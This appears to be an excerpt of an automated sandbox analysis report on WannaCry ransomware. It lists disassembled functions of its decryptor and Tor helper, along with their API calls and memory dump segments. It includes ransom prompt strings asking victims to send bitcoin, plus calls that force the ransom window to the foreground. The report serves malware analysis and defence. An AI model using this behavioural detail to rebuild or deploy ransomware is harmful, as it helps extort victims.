    • Snapshot File: hcaresult_18_1_400000_@WanaDecryptor@.jbxd
    Function 00404CF0, Relevance: 6.0, APIs: 4, Instructions: 37
    APIs
    • #2414.MFC42(?,?,?,?,?,?,?,00404CD8), ref: 00404D2C
    • #2414.MFC42(?,?,?,?,?,?,?,00404CD8), ref: 00404D4B
    • #800.MFC42(?,?,?,?,?,?,?,00404CD8), ref: 00404D5E
    • #641.MFC42(?,?,?,?,?,?,?,00404CD8), ref: 00404D6D
    Memory Dump Source
    • Source File: 00000012.00000001.1667276534.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000012.00000001.1667261562.00400000.00000002.sdmp
    • Associated: 00000012.00000001.1667296194.00415000.00000002.sdmp
    • Associated: 00000012.00000001.1667823221.0041F000.00000008.sdmp
    • Associated: 00000012.00000001.1668481800.00422000.00000004.sdmp
    • Associated: 00000012.00000001.1668680404.00423000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_18_1_400000_@WanaDecryptor@.jbxd
    Function 00404170, Relevance: 6.0, APIs: 4, Instructions: 34
    APIs
    • #2414.MFC42(?,?,?,?,?,?,?,00404158), ref: 004041B2
    • #800.MFC42(?,?,?,?,?,?,?,00404158), ref: 004041C5
    • #800.MFC42(?,?,?,?,?,?,?,00404158), ref: 004041D2
    • #795.MFC42(?,?,?,?,?,?,?,00404158), ref: 004041E1
    Memory Dump Source
    • Source File: 00000012.00000001.1667276534.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000012.00000001.1667261562.00400000.00000002.sdmp
    • Associated: 00000012.00000001.1667296194.00415000.00000002.sdmp
    • Associated: 00000012.00000001.1667823221.0041F000.00000008.sdmp
    • Associated: 00000012.00000001.1668481800.00422000.00000004.sdmp
    • Associated: 00000012.00000001.1668680404.00423000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_18_1_400000_@WanaDecryptor@.jbxd
    Function 00402E00, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 57
    APIs
    • #825.MFC42(?,?,00000000,?,?,0040276A,?,?,?), ref: 00402E44
    • #825.MFC42(?,?,00000000,?,?,0040276A,?,?,?), ref: 00402E56
    Strings
    Memory Dump Source
    • Source File: 00000012.00000001.1667276534.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000012.00000001.1667261562.00400000.00000002.sdmp
    • Associated: 00000012.00000001.1667296194.00415000.00000002.sdmp
    • Associated: 00000012.00000001.1667823221.0041F000.00000008.sdmp
    • Associated: 00000012.00000001.1668481800.00422000.00000004.sdmp
    • Associated: 00000012.00000001.1668680404.00423000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_18_1_400000_@WanaDecryptor@.jbxd
    Function 00407650, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24
    APIs
    • #2379.MFC42(00000001), ref: 00407667
    • #2379.MFC42 ref: 00407692
      • Part of subcall function 0040B620: FindWindowW.USER32(00000000,00000000), ref: 0040B628
      • Part of subcall function 0040B620: ShowWindow.USER32(00000000,00000005), ref: 0040B638
      • Part of subcall function 0040B620: SetWindowPos.USER32(00000000,000000FF,00000000,00000000,00000000,00000000,00000043), ref: 0040B651
      • Part of subcall function 0040B620: SetWindowPos.USER32(00000000,000000FE,00000000,00000000,00000000,00000000,00000043), ref: 0040B660
      • Part of subcall function 0040B620: SetForegroundWindow.USER32(00000000), ref: 0040B663
      • Part of subcall function 0040B620: SetFocus.USER32(00000000), ref: 0040B66A
      • Part of subcall function 0040B620: SetActiveWindow.USER32(00000000), ref: 0040B671
      • Part of subcall function 0040B620: BringWindowToTop.USER32(00000000), ref: 0040B678
      • Part of subcall function 0040B620: ExitProcess.KERNEL32 ref: 0040B689
      • Part of subcall function 004076A0: time.MSVCRT ref: 004076DA
      • Part of subcall function 004076A0: sprintf.MSVCRT ref: 0040780E
      • Part of subcall function 004076A0: SendMessageA.USER32(?,00000402,?,00000000), ref: 0040785B
      • Part of subcall function 004076A0: SendMessageA.USER32(?,00000402,?,00000000), ref: 00407870
      • Part of subcall function 004076A0: #540.MFC42 ref: 00407876
      • Part of subcall function 004076A0: _ftol.MSVCRT ref: 004078AA
      • Part of subcall function 004076A0: #2818.MFC42(?,$%d,00000000), ref: 004078BE
      • Part of subcall function 004076A0: #2818.MFC42(?,Send $%d worth of bitcoin to this address:,00000000), ref: 004078D1
      • Part of subcall function 004076A0: #2818.MFC42(?,%.1f BTC,?,?), ref: 004078F5
      • Part of subcall function 004076A0: #2818.MFC42(?,Send %.1f BTC to this address:,?,?), ref: 00407909
      • Part of subcall function 004076A0: #3092.MFC42(00000402,?), ref: 0040791D
      • Part of subcall function 004076A0: #6199.MFC42(00000402,?), ref: 00407924
      • Part of subcall function 004076A0: InvalidateRect.USER32(?,00000000,00000001), ref: 0040795A
      • Part of subcall function 004076A0: #800.MFC42 ref: 0040799F
    Strings
    Memory Dump Source
    • Source File: 00000012.00000001.1667276534.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000012.00000001.1667261562.00400000.00000002.sdmp
    • Associated: 00000012.00000001.1667296194.00415000.00000002.sdmp
    • Associated: 00000012.00000001.1667823221.0041F000.00000008.sdmp
    • Associated: 00000012.00000001.1668481800.00422000.00000004.sdmp
    • Associated: 00000012.00000001.1668680404.00423000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_18_1_400000_@WanaDecryptor@.jbxd

    Analysis Process: taskhsvc.exe PID: 3500 Parent PID: 3408

    Executed Functions

    Function 001C11FD, Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 157
    APIs
      • Part of subcall function 003F6BB0: VirtualQuery.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 003F6D3B
      • Part of subcall function 003F6BB0: VirtualProtect.KERNELBASE ref: 003F6D6C
    • SetUnhandledExceptionFilter.KERNEL32 ref: 001C1285
    • malloc.MSVCRT ref: 001C134A
    • strlen.MSVCRT ref: 001C136A
    • malloc.MSVCRT ref: 001C1375
    • memcpy.MSVCRT ref: 001C1391
    • _cexit.MSVCRT ref: 001C13FF
    • _amsg_exit.MSVCRT ref: 001C142B
    • _initterm.MSVCRT ref: 001C144D
    • exit.MSVCRT ref: 001C14AE
      • Part of subcall function 003F6F10: GetSystemTimeAsFileTime.KERNEL32 ref: 003F6F49
      • Part of subcall function 003F6F10: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,001C14F2), ref: 003F6F5A
      • Part of subcall function 003F6F10: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,001C14F2), ref: 003F6F62
      • Part of subcall function 003F6F10: GetTickCount.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,001C14F2), ref: 003F6F6A
      • Part of subcall function 003F6F10: QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,001C14F2), ref: 003F6F79
    Strings
    Memory Dump Source
    • Source File: 00000013.00000002.1855013399.001C1000.00000020.sdmp, Offset: 001C0000, based on PE: true
    • Associated: 00000013.00000002.1854999429.001C0000.00000002.sdmp
    • Associated: 00000013.00000002.1855026342.001C9000.00000080.sdmp
    • Associated: 00000013.00000002.1855040395.001CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855065746.00225000.00000080.sdmp
    • Associated: 00000013.00000002.1855077166.00228000.00000040.sdmp
    • Associated: 00000013.00000002.1855089255.0022F000.00000080.sdmp
    • Associated: 00000013.00000002.1855104216.00230000.00000040.sdmp
    • Associated: 00000013.00000002.1855122824.00266000.00000080.sdmp
    • Associated: 00000013.00000002.1855138358.00267000.00000040.sdmp
    • Associated: 00000013.00000002.1855155118.0028B000.00000080.sdmp
    • Associated: 00000013.00000002.1855168257.0028C000.00000040.sdmp
    • Associated: 00000013.00000002.1855182515.0028D000.00000080.sdmp
    • Associated: 00000013.00000002.1855196147.00290000.00000040.sdmp
    • Associated: 00000013.00000002.1855225498.002D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855239885.002D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855254056.002D6000.00000080.sdmp
    • Associated: 00000013.00000002.1855272578.002D7000.00000040.sdmp
    • Associated: 00000013.00000002.1855294963.002D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855305598.002D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855317495.002DA000.00000080.sdmp
    • Associated: 00000013.00000002.1855329417.002DC000.00000040.sdmp
    • Associated: 00000013.00000002.1855351346.00348000.00000080.sdmp
    • Associated: 00000013.00000002.1855370256.003BA000.00000040.sdmp
    • Associated: 00000013.00000002.1855382391.003C3000.00000080.sdmp
    • Associated: 00000013.00000002.1855395021.003C4000.00000040.sdmp
    • Associated: 00000013.00000002.1855406286.003C6000.00000080.sdmp
    • Associated: 00000013.00000002.1855419002.003CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855435469.003CC000.00000080.sdmp
    • Associated: 00000013.00000002.1855447997.003CE000.00000040.sdmp
    • Associated: 00000013.00000002.1855459106.003CF000.00000080.sdmp
    • Associated: 00000013.00000002.1855472726.003D0000.00000040.sdmp
    • Associated: 00000013.00000002.1855490051.003D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855500813.003D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855512417.003D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855523270.003D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855533374.003E0000.00000080.sdmp
    • Associated: 00000013.00000002.1855544480.003E1000.00000040.sdmp
    • Associated: 00000013.00000002.1855556363.003E4000.00000080.sdmp
    • Associated: 00000013.00000002.1855569787.003E5000.00000040.sdmp
    • Associated: 00000013.00000002.1855588250.003F6000.00000080.sdmp
    • Associated: 00000013.00000002.1855603610.003FE000.00000004.sdmp
    • Associated: 00000013.00000002.1855617063.003FF000.00000008.sdmp
    • Associated: 00000013.00000002.1855627940.00400000.00000004.sdmp
    • Associated: 00000013.00000002.1855639237.00402000.00000008.sdmp
    • Associated: 00000013.00000002.1855664504.00403000.00000004.sdmp
    • Associated: 00000013.00000002.1855675077.00405000.00000008.sdmp
    • Associated: 00000013.00000002.1855685431.0040B000.00000004.sdmp
    • Associated: 00000013.00000002.1855695362.0040C000.00000002.sdmp
    • Associated: 00000013.00000002.1855714597.0049D000.00000004.sdmp
    • Associated: 00000013.00000002.1855722372.004A3000.00000008.sdmp
    • Associated: 00000013.00000002.1855730014.004A8000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    Function 001EC647, Relevance: 17.8, APIs: 6, Strings: 4, Instructions: 304
    APIs
      • Part of subcall function 0021F792: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,00206074), ref: 0021F7B2
    • abort.MSVCRT ref: 001EC6C4
    • abort.MSVCRT ref: 001EC703
    • abort.MSVCRT ref: 001EC742
      • Part of subcall function 00316F50: __stack_chk_fail.LIBSSP-0 ref: 00316FA6
      • Part of subcall function 001EAE16: free.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,001EB1E9), ref: 001EAE92
      • Part of subcall function 001EAE16: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,?,?,?,?,001EB1E9), ref: 001EAEC5
      • Part of subcall function 001EAECC: __stack_chk_fail.LIBSSP-0 ref: 001EAEF2
      • Part of subcall function 0031721B: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,00316FE0), ref: 0031724B
      • Part of subcall function 001F4130: abort.MSVCRT ref: 001F419F
      • Part of subcall function 001F4130: __stack_chk_fail.LIBSSP-0 ref: 001F43C1
    • abort.MSVCRT ref: 001EC9EF
    • connect.WS2_32 ref: 001ECA38
    • __stack_chk_fail.LIBSSP-0 ref: 001ECB59
      • Part of subcall function 0031910D: __stack_chk_fail.LIBSSP-0 ref: 00319194
      • Part of subcall function 0031919B: strerror.MSVCRT ref: 003191ED
      • Part of subcall function 0031919B: __stack_chk_fail.LIBSSP-0 ref: 003191FD
      • Part of subcall function 00316DE9: __stack_chk_fail.LIBSSP-0 ref: 00316E9A
      • Part of subcall function 001F33ED: __stack_chk_fail.LIBSSP-0 ref: 001F351A
      • Part of subcall function 00313842: __stack_chk_fail.LIBSSP-0 ref: 003138B7
      • Part of subcall function 001C1956: abort.MSVCRT ref: 001C19AF
      • Part of subcall function 001C1956: abort.MSVCRT ref: 001C1A60
      • Part of subcall function 001C1956: abort.MSVCRT ref: 001C1AA4
      • Part of subcall function 001C1956: event_new.LIBEVENT-2-0-5 ref: 001C1B0F
      • Part of subcall function 001C1956: event_new.LIBEVENT-2-0-5 ref: 001C1B47
      • Part of subcall function 001C1956: __stack_chk_fail.LIBSSP-0 ref: 001C1BD3
      • Part of subcall function 00316562: strrchr.MSVCRT ref: 00316586
      • Part of subcall function 00316562: strrchr.MSVCRT ref: 0031659C
      • Part of subcall function 00316562: __stack_chk_fail.LIBSSP-0 ref: 00316601
      • Part of subcall function 00319764: __stack_chk_fail.LIBSSP-0 ref: 00319857
      • Part of subcall function 003138BE: free.MSVCRT ref: 0031395B
      • Part of subcall function 003138BE: __stack_chk_fail.LIBSSP-0 ref: 00313978
      • Part of subcall function 0031985E: __stack_chk_fail.LIBSSP-0 ref: 00319A18
    Strings
    Memory Dump Source
    • Source File: 00000013.00000002.1855040395.001CA000.00000040.sdmp, Offset: 001C0000, based on PE: true
    • Associated: 00000013.00000002.1854999429.001C0000.00000002.sdmp
    • Associated: 00000013.00000002.1855013399.001C1000.00000020.sdmp
    • Associated: 00000013.00000002.1855026342.001C9000.00000080.sdmp
    • Associated: 00000013.00000002.1855065746.00225000.00000080.sdmp
    • Associated: 00000013.00000002.1855077166.00228000.00000040.sdmp
    • Associated: 00000013.00000002.1855089255.0022F000.00000080.sdmp
    • Associated: 00000013.00000002.1855104216.00230000.00000040.sdmp
    • Associated: 00000013.00000002.1855122824.00266000.00000080.sdmp
    • Associated: 00000013.00000002.1855138358.00267000.00000040.sdmp
    • Associated: 00000013.00000002.1855155118.0028B000.00000080.sdmp
    • Associated: 00000013.00000002.1855168257.0028C000.00000040.sdmp
    • Associated: 00000013.00000002.1855182515.0028D000.00000080.sdmp
    • Associated: 00000013.00000002.1855196147.00290000.00000040.sdmp
    • Associated: 00000013.00000002.1855225498.002D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855239885.002D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855254056.002D6000.00000080.sdmp
    • Associated: 00000013.00000002.1855272578.002D7000.00000040.sdmp
    • Associated: 00000013.00000002.1855294963.002D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855305598.002D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855317495.002DA000.00000080.sdmp
    • Associated: 00000013.00000002.1855329417.002DC000.00000040.sdmp
    • Associated: 00000013.00000002.1855351346.00348000.00000080.sdmp
    • Associated: 00000013.00000002.1855370256.003BA000.00000040.sdmp
    • Associated: 00000013.00000002.1855382391.003C3000.00000080.sdmp
    • Associated: 00000013.00000002.1855395021.003C4000.00000040.sdmp
    • Associated: 00000013.00000002.1855406286.003C6000.00000080.sdmp
    • Associated: 00000013.00000002.1855419002.003CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855435469.003CC000.00000080.sdmp
    • Associated: 00000013.00000002.1855447997.003CE000.00000040.sdmp
    • Associated: 00000013.00000002.1855459106.003CF000.00000080.sdmp
    • Associated: 00000013.00000002.1855472726.003D0000.00000040.sdmp
    • Associated: 00000013.00000002.1855490051.003D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855500813.003D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855512417.003D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855523270.003D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855533374.003E0000.00000080.sdmp
    • Associated: 00000013.00000002.1855544480.003E1000.00000040.sdmp
    • Associated: 00000013.00000002.1855556363.003E4000.00000080.sdmp
    • Associated: 00000013.00000002.1855569787.003E5000.00000040.sdmp
    • Associated: 00000013.00000002.1855588250.003F6000.00000080.sdmp
    • Associated: 00000013.00000002.1855603610.003FE000.00000004.sdmp
    • Associated: 00000013.00000002.1855617063.003FF000.00000008.sdmp
    • Associated: 00000013.00000002.1855627940.00400000.00000004.sdmp
    • Associated: 00000013.00000002.1855639237.00402000.00000008.sdmp
    • Associated: 00000013.00000002.1855664504.00403000.00000004.sdmp
    • Associated: 00000013.00000002.1855675077.00405000.00000008.sdmp
    • Associated: 00000013.00000002.1855685431.0040B000.00000004.sdmp
    • Associated: 00000013.00000002.1855695362.0040C000.00000002.sdmp
    • Associated: 00000013.00000002.1855714597.0049D000.00000004.sdmp
    • Associated: 00000013.00000002.1855722372.004A3000.00000008.sdmp
    • Associated: 00000013.00000002.1855730014.004A8000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    Function 00335EA1, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 67
    APIs
    • ERR_load_crypto_strings.LIBEAY32 ref: 00335EC8
    • OPENSSL_add_all_algorithms_noconf.LIBEAY32 ref: 00335ECD
      • Part of subcall function 0033D6F1: CRYPTO_num_locks.LIBEAY32(?,?,?,?,?,?,-00000001,?,00335ED7), ref: 0033D702
      • Part of subcall function 0033D6F1: CRYPTO_set_locking_callback.LIBEAY32 ref: 0033D75B
      • Part of subcall function 0033D6F1: CRYPTO_THREADID_set_callback.LIBEAY32 ref: 0033D767
      • Part of subcall function 0033D6F1: __stack_chk_fail.LIBSSP-0 ref: 0033D77C
    • SSLeay_version.LIBEAY32 ref: 00335EE6
    • strcmp.MSVCRT ref: 00335F05
      • Part of subcall function 00313842: __stack_chk_fail.LIBSSP-0 ref: 003138B7
      • Part of subcall function 00335DD3: RAND_SSLeay.LIBEAY32 ref: 00335DE3
      • Part of subcall function 00335DD3: RAND_get_rand_method.LIBEAY32 ref: 00335DEB
      • Part of subcall function 00335DD3: RAND_set_rand_method.LIBEAY32(?,?,?,?,?,?,?,00335F89), ref: 00335E1F
      • Part of subcall function 00335DD3: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,00335F89), ref: 00335E3B
      • Part of subcall function 0033CC1C: RAND_poll.LIBEAY32 ref: 0033CC3A
      • Part of subcall function 0033CC1C: RAND_seed.LIBEAY32(?,?,?,?,?,?,?,?,?,?,?,?,?,00335F8E), ref: 0033CC9E
      • Part of subcall function 0033CC1C: RAND_status.LIBEAY32(?,?,?,?,?,?,?,?,?,?,?,?,?,00335F8E), ref: 0033CCCA
      • Part of subcall function 0033CC1C: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,?,?,?,?,00335F8E), ref: 0033CCEB
      • Part of subcall function 00335E42: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,00335F9E), ref: 00335E9A
      • Part of subcall function 00345F8F: __stack_chk_fail.LIBSSP-0 ref: 00345FB0
      • Part of subcall function 00347322: __stack_chk_fail.LIBSSP-0 ref: 00347343
    • __stack_chk_fail.LIBSSP-0 ref: 00335FC3
    Strings
    Memory Dump Source
    • Source File: 00000013.00000002.1855329417.002DC000.00000040.sdmp, Offset: 001C0000, based on PE: true
    • Associated: 00000013.00000002.1854999429.001C0000.00000002.sdmp
    • Associated: 00000013.00000002.1855013399.001C1000.00000020.sdmp
    • Associated: 00000013.00000002.1855026342.001C9000.00000080.sdmp
    • Associated: 00000013.00000002.1855040395.001CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855065746.00225000.00000080.sdmp
    • Associated: 00000013.00000002.1855077166.00228000.00000040.sdmp
    • Associated: 00000013.00000002.1855089255.0022F000.00000080.sdmp
    • Associated: 00000013.00000002.1855104216.00230000.00000040.sdmp
    • Associated: 00000013.00000002.1855122824.00266000.00000080.sdmp
    • Associated: 00000013.00000002.1855138358.00267000.00000040.sdmp
    • Associated: 00000013.00000002.1855155118.0028B000.00000080.sdmp
    • Associated: 00000013.00000002.1855168257.0028C000.00000040.sdmp
    • Associated: 00000013.00000002.1855182515.0028D000.00000080.sdmp
    • Associated: 00000013.00000002.1855196147.00290000.00000040.sdmp
    • Associated: 00000013.00000002.1855225498.002D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855239885.002D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855254056.002D6000.00000080.sdmp
    • Associated: 00000013.00000002.1855272578.002D7000.00000040.sdmp
    • Associated: 00000013.00000002.1855294963.002D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855305598.002D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855317495.002DA000.00000080.sdmp
    • Associated: 00000013.00000002.1855351346.00348000.00000080.sdmp
    • Associated: 00000013.00000002.1855370256.003BA000.00000040.sdmp
    • Associated: 00000013.00000002.1855382391.003C3000.00000080.sdmp
    • Associated: 00000013.00000002.1855395021.003C4000.00000040.sdmp
    • Associated: 00000013.00000002.1855406286.003C6000.00000080.sdmp
    • Associated: 00000013.00000002.1855419002.003CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855435469.003CC000.00000080.sdmp
    • Associated: 00000013.00000002.1855447997.003CE000.00000040.sdmp
    • Associated: 00000013.00000002.1855459106.003CF000.00000080.sdmp
    • Associated: 00000013.00000002.1855472726.003D0000.00000040.sdmp
    • Associated: 00000013.00000002.1855490051.003D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855500813.003D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855512417.003D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855523270.003D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855533374.003E0000.00000080.sdmp
    • Associated: 00000013.00000002.1855544480.003E1000.00000040.sdmp
    • Associated: 00000013.00000002.1855556363.003E4000.00000080.sdmp
    • Associated: 00000013.00000002.1855569787.003E5000.00000040.sdmp
    • Associated: 00000013.00000002.1855588250.003F6000.00000080.sdmp
    • Associated: 00000013.00000002.1855603610.003FE000.00000004.sdmp
    • Associated: 00000013.00000002.1855617063.003FF000.00000008.sdmp
    • Associated: 00000013.00000002.1855627940.00400000.00000004.sdmp
    • Associated: 00000013.00000002.1855639237.00402000.00000008.sdmp
    • Associated: 00000013.00000002.1855664504.00403000.00000004.sdmp
    • Associated: 00000013.00000002.1855675077.00405000.00000008.sdmp
    • Associated: 00000013.00000002.1855685431.0040B000.00000004.sdmp
    • Associated: 00000013.00000002.1855695362.0040C000.00000002.sdmp
    • Associated: 00000013.00000002.1855714597.0049D000.00000004.sdmp
    • Associated: 00000013.00000002.1855722372.004A3000.00000008.sdmp
    • Associated: 00000013.00000002.1855730014.004A8000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    Function 0033D6F1, Relevance: 6.0, APIs: 4, Instructions: 41
    APIs
    • CRYPTO_num_locks.LIBEAY32(?,?,?,?,?,?,-00000001,?,00335ED7), ref: 0033D702
      • Part of subcall function 003211F6: abort.MSVCRT ref: 0032125C
      • Part of subcall function 003211F6: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,?,?,?,?,00319B54), ref: 0032127B
      • Part of subcall function 00332920: __stack_chk_fail.LIBSSP-0 ref: 00332958
    • CRYPTO_set_locking_callback.LIBEAY32 ref: 0033D75B
    • CRYPTO_THREADID_set_callback.LIBEAY32 ref: 0033D767
    • __stack_chk_fail.LIBSSP-0 ref: 0033D77C
    Memory Dump Source
    • Source File: 00000013.00000002.1855329417.002DC000.00000040.sdmp, Offset: 001C0000, based on PE: true
    • Associated: 00000013.00000002.1854999429.001C0000.00000002.sdmp
    • Associated: 00000013.00000002.1855013399.001C1000.00000020.sdmp
    • Associated: 00000013.00000002.1855026342.001C9000.00000080.sdmp
    • Associated: 00000013.00000002.1855040395.001CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855065746.00225000.00000080.sdmp
    • Associated: 00000013.00000002.1855077166.00228000.00000040.sdmp
    • Associated: 00000013.00000002.1855089255.0022F000.00000080.sdmp
    • Associated: 00000013.00000002.1855104216.00230000.00000040.sdmp
    • Associated: 00000013.00000002.1855122824.00266000.00000080.sdmp
    • Associated: 00000013.00000002.1855138358.00267000.00000040.sdmp
    • Associated: 00000013.00000002.1855155118.0028B000.00000080.sdmp
    • Associated: 00000013.00000002.1855168257.0028C000.00000040.sdmp
    • Associated: 00000013.00000002.1855182515.0028D000.00000080.sdmp
    • Associated: 00000013.00000002.1855196147.00290000.00000040.sdmp
    • Associated: 00000013.00000002.1855225498.002D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855239885.002D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855254056.002D6000.00000080.sdmp
    • Associated: 00000013.00000002.1855272578.002D7000.00000040.sdmp
    • Associated: 00000013.00000002.1855294963.002D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855305598.002D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855317495.002DA000.00000080.sdmp
    • Associated: 00000013.00000002.1855351346.00348000.00000080.sdmp
    • Associated: 00000013.00000002.1855370256.003BA000.00000040.sdmp
    • Associated: 00000013.00000002.1855382391.003C3000.00000080.sdmp
    • Associated: 00000013.00000002.1855395021.003C4000.00000040.sdmp
    • Associated: 00000013.00000002.1855406286.003C6000.00000080.sdmp
    • Associated: 00000013.00000002.1855419002.003CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855435469.003CC000.00000080.sdmp
    • Associated: 00000013.00000002.1855447997.003CE000.00000040.sdmp
    • Associated: 00000013.00000002.1855459106.003CF000.00000080.sdmp
    • Associated: 00000013.00000002.1855472726.003D0000.00000040.sdmp
    • Associated: 00000013.00000002.1855490051.003D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855500813.003D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855512417.003D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855523270.003D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855533374.003E0000.00000080.sdmp
    • Associated: 00000013.00000002.1855544480.003E1000.00000040.sdmp
    • Associated: 00000013.00000002.1855556363.003E4000.00000080.sdmp
    • Associated: 00000013.00000002.1855569787.003E5000.00000040.sdmp
    • Associated: 00000013.00000002.1855588250.003F6000.00000080.sdmp
    • Associated: 00000013.00000002.1855603610.003FE000.00000004.sdmp
    • Associated: 00000013.00000002.1855617063.003FF000.00000008.sdmp
    • Associated: 00000013.00000002.1855627940.00400000.00000004.sdmp
    • Associated: 00000013.00000002.1855639237.00402000.00000008.sdmp
    • Associated: 00000013.00000002.1855664504.00403000.00000004.sdmp
    • Associated: 00000013.00000002.1855675077.00405000.00000008.sdmp
    • Associated: 00000013.00000002.1855685431.0040B000.00000004.sdmp
    • Associated: 00000013.00000002.1855695362.0040C000.00000002.sdmp
    • Associated: 00000013.00000002.1855714597.0049D000.00000004.sdmp
    • Associated: 00000013.00000002.1855722372.004A3000.00000008.sdmp
    • Associated: 00000013.00000002.1855730014.004A8000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    Function 001EAF67, Relevance: 3.0, APIs: 2, Instructions: 45
    APIs
    • listen.WS2_32(?,?,?,?,?,?,?,?,?,?,?,?,?,001EB46A), ref: 001EAF92
      • Part of subcall function 00313842: __stack_chk_fail.LIBSSP-0 ref: 003138B7
    • __stack_chk_fail.LIBSSP-0 ref: 001EB00E
    Memory Dump Source
    • Source File: 00000013.00000002.1855040395.001CA000.00000040.sdmp, Offset: 001C0000, based on PE: true
    • Associated: 00000013.00000002.1854999429.001C0000.00000002.sdmp
    • Associated: 00000013.00000002.1855013399.001C1000.00000020.sdmp
    • Associated: 00000013.00000002.1855026342.001C9000.00000080.sdmp
    • Associated: 00000013.00000002.1855065746.00225000.00000080.sdmp
    • Associated: 00000013.00000002.1855077166.00228000.00000040.sdmp
    • Associated: 00000013.00000002.1855089255.0022F000.00000080.sdmp
    • Associated: 00000013.00000002.1855104216.00230000.00000040.sdmp
    • Associated: 00000013.00000002.1855122824.00266000.00000080.sdmp
    • Associated: 00000013.00000002.1855138358.00267000.00000040.sdmp
    • Associated: 00000013.00000002.1855155118.0028B000.00000080.sdmp
    • Associated: 00000013.00000002.1855168257.0028C000.00000040.sdmp
    • Associated: 00000013.00000002.1855182515.0028D000.00000080.sdmp
    • Associated: 00000013.00000002.1855196147.00290000.00000040.sdmp
    • Associated: 00000013.00000002.1855225498.002D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855239885.002D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855254056.002D6000.00000080.sdmp
    • Associated: 00000013.00000002.1855272578.002D7000.00000040.sdmp
    • Associated: 00000013.00000002.1855294963.002D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855305598.002D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855317495.002DA000.00000080.sdmp
    • Associated: 00000013.00000002.1855329417.002DC000.00000040.sdmp
    • Associated: 00000013.00000002.1855351346.00348000.00000080.sdmp
    • Associated: 00000013.00000002.1855370256.003BA000.00000040.sdmp
    • Associated: 00000013.00000002.1855382391.003C3000.00000080.sdmp
    • Associated: 00000013.00000002.1855395021.003C4000.00000040.sdmp
    • Associated: 00000013.00000002.1855406286.003C6000.00000080.sdmp
    • Associated: 00000013.00000002.1855419002.003CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855435469.003CC000.00000080.sdmp
    • Associated: 00000013.00000002.1855447997.003CE000.00000040.sdmp
    • Associated: 00000013.00000002.1855459106.003CF000.00000080.sdmp
    • Associated: 00000013.00000002.1855472726.003D0000.00000040.sdmp
